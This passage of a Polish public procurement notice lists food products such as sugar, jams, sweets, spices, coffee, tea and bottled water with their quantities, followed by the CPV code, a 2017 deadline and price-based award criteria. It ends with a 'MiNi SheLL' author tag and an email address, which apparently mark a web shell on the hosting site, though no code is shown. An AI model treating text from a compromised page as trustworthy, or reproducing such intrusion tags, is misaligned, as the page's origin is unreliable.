paczka 450 g	szt	20
Ananas w puszce - 565 g 
Kier , MK lub równoważne 	szt.	200
Brzoskwinie w syropie
 w pusze - 850 g - Kier
 lub równoważne 	szt.	200
Budyń 40 g różne smaki- 
Winiary, Gellwe lub równoważne 	szt.	1000
Chipsy cebulowe 250g	szt	20
Chipsy paprykowe 250g.	szt	20
Chrupki orzechowe 250g	szt	20
Chrupki paprykowe 250g	szt.	20
Chrzan tarty 160g	szt.	400
Cukier 1 kg-  biały kryształ	kg	2000
Cukier puder- 500 g 
Diamont lub równoważne	kg	5
Dżem niskosłodzony - 
260 g różne smaki	szt.	300
Dżem wysokosłodzony - 
260 g różne smaki	szt.	300
Dżemiki jednorazowe 25g	kg	50
Galaretka 75g różne smaki
Winiary, Gellwe lub równoważne	szt.	900
Groszek konserwowy tradycyjny 400 g, Pudliszki, Kwidzyn 
lub równoważne	szt.	20
Jabłka suszone 	kg	10
Kawa zbożowa w opk. 500 g	kg	100
Ketchup pikantny 500g
Tortex, Kotlin lub równoważne 	szt.	30
Ketchup łagodny 500g
Dawtona, Tortex lub równoważne 	szt	40
Kisiel 75g  różne smaki  Winiary, Gellwe, lub równoważne	szt.	50
Kokos wiórki	kg	4
Kokos 100 g w opak.	szt	100
Koncentrat  pomidorowy 1780 g , Pudliszki lub równoważne 	szt	350
Kremy do tortów 120 g- różne	szt	30
Kukurydza   w puszce 400 g, Dawtona , Kwidzyn lub równoważne 	szt	80
Majeranek luzem 	kg	8
Mąka ziemniaczana opak.  1 kg	kg	200
Migdały - 100 g 
Kresto lub równoważne	szt	80
Miód sztuczny 370 g	szt.	6
Morele suszone	kg	5
Ogórki konserwowe  słoik 1 l  
Rolnik, Krakus lub równoważne 	szt.	100
Oliwki czarne bezpestkowe 
900 g, Pudliszki lub równoważne 	szt.	3
Oliwki zielone bezpestkowe 
900 g, Pudliszki lub równoważne 	szt.	3
Pieczarki marynowane 370 ml
Rolnik lub równoważne 	szt.	10
Pieprz ziołowy luzem	kg	5
Przyprawa do drobiu 	kg	4
Przyprawa do zup płynie - 1 l,
Winiary lub równoważne 	szt.	400
Przyprawa Kucharek - 1 kg Warzywko lub równoważne	szt.	640
Rodzynki luzem 	kg	10
Rodzynki - 100 g-
Kresto lub równoważne 	szt.	100
Sos do spaghetti w proszku  	szt.	20
Syrop malinowy 500 g 	szt.	200
Śliwka suszona 	kg	10
Śmietana  Fix w proszku 	szt.	30
Śmietana  w proszku  55g
Śnieżka lub równoważne	szt.	20
Śmietanka 80 g 
Cremona lub równoważne	szt.	100
Zaprawa cytrynowa - 1 l
Cytrynka lub równoważne 	szt.	100
Zioła prowansalskie 10 g	szt.	10
Zupa w proszku grochowa, pomidorowa 	kg	10
Zupa w proszku grochowa, pomidorowa - 36 g	szt.	30
Żelatyna wieprzowa  50 g 	szt.	70
Aromat do ciast - 10 ml
Delecta lub równoważne 	szt.	12
Baton w czekoladzie - 50 g
Ikar lub równoważne 	szt.	300
Baton w czekoladzie - 50 g
Danusia lub równoważne 	szt.	300
Baton w czekoladzie - 50 g
Maciek lub równoważne 	szt.	300
Bombonierka w czekoladzie 228g Solidarność lub równoważne 	szt.	10
Bombonierka w czekoladzie 300g 
(Wedel, Goplana, Mieszko, Solidarność lub równoważne) 	szt.	10
Ciastka - delicje - 147 g	szt.	150
Ciastka biszkopty luzem	kg	30
Ciastka czekoladowe luzem - różne 	kg	10
Ciastka kruche rogaliki z marmoladą  	kg	5
Ciastka kruche deserowe z cukrem 	kg	15
Ciastka kruche kocie oczka	kg	3
Ciastka kruche markizy 	kg	20
Ciastka kruche maślane 	kg	5
Ciastka kruche rozetki pudrowe 	kg	5
Ciastka kruche ślimaki z marmoladą	kg	3
Ciastka kruche z marmoladą 	kg	20
Ciastka kruche z maszynki	kg	3
Cukier waniliowy - 16 g
Dr Oetker lub równoważne 	szt.	100
Cukierki landryny - 100 g	szt.	20
Cukierki  jajeczka w czekoladzie-	kg	10
Cukierki w czekoladzie
 Michałki, lub równoważne 	kg	30
Cukierki w czekoladzie- 
 Mieszanka Krakowska,
 lub równoważne 	kg	30
Cukierki w czekoladzie- trufle	kg	15
 Cukierki zwykłe 	kg	20
Cynamon luzem 	kg	4
Czekolada dla cukrzyków -100 g	szt.	20
Czekolada w proszku -1 kg
Milka lub równoważne 	szt.	1
Czekolada nadziewana -100 g - różne smaki - miętowa, jagodowa truskawkowa, Wawel, Wedel, Goplana lub równoważne 	szt.	200
Czekolada 100 g - mleczna, gorzka, mleczno-deserowa, 	szt.	400
Drożdże 100 g	szt.	20
Gałka muszkatałowa 100 g	szt.	15
Herbata ekspresowa ( 100 szt)
Saga, Minutka lub równoważne 	opak 	200
Herbata granulowana indyjska 
80 g	opak 	1500
 Herbata ziołowa - mięta, melisa - 20 saszetek 	opak 	20
Herbatniki  148 g - Krakuski, Łakotki lub równoważne 	opak 	100
 Kakao - 100 g Wawel, Decomoreno lub równoważne 	szt.	120
Kawa naturalna - 100 g
Prima, Gala lub równoważne 	szt.	200
Kawa naturalna 250 g
Mk, Premium lub równoważne 	szt.	150
Kawa rozpuszczalna 100 g 
Nescafe lub równoważne 	szt.	80
Kminek mielony 	kg	6
Kocie języczki 100 g
lub równoważne 	szt.	5
Krem czekoladowy 350 g 
 Nutella lub równoważne 	szt.	30
Liść laurowy luzem 	kg	2
Musztarda łagodna, ostra 	szt.	300
Ocet spirytusowy - 1 l 	szt	200
Orzechy laskowe w czekoladzie 80 g, Jutrzenka lub równoważne 	szt.	100
Paluszki solone 80 g	szt.	50
Papryka słodka w proszku 	kg	 4
Pastylki miętowe w czekoladzie
210 g-Wawel lub równoważne  	szt.	10
Pieprz czarny mielony luzem	kg	 6
Pierniki lukrowane luzem 	kg	50
Pierniki w czekoladzie luzem 	kg	60
Proszek do pieczenia 16 g
Dr Oetker lub równoważne 	szt.	30
Przyprawa korzenna 20 g
Prymat lub równoważne 	szt.	10
Ptasie Mleczko, Milka  350g,  smak śmietankowy, waniliowym
lub równoważne 	szt.	10
Rafaello kokosowe, Smakołyk - 150 g lub równoważne 	szt.	5
Rodzynki w czekoladzie 100 g
Jutrzenka lub równoważne 	szt.	100
Rogalik 80g z nadzieniem waniliowym, czekoladowym, truskawkowym -7 Days, Duble max, Croissant lub równoważne 	szt.	100
Soda oczyszczona 15 g	szt.	10
Sól spożywcza 1 kg 	szt.	500
Wafelki w czekoladzie -50 g
Góralki, Grześki, Princessa, Prince Polo  lub równoważne 	szt.	1000
Woda gazowana 0,5 l	szt.	100
Woda gazowana 1,5 l	szt.	150
Woda niegazowana 0,5 l	szt.	250
Woda niegazowana 1,5 l	szt.	250
Ziele angielskie luz	kg	 6
Lizaki 	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com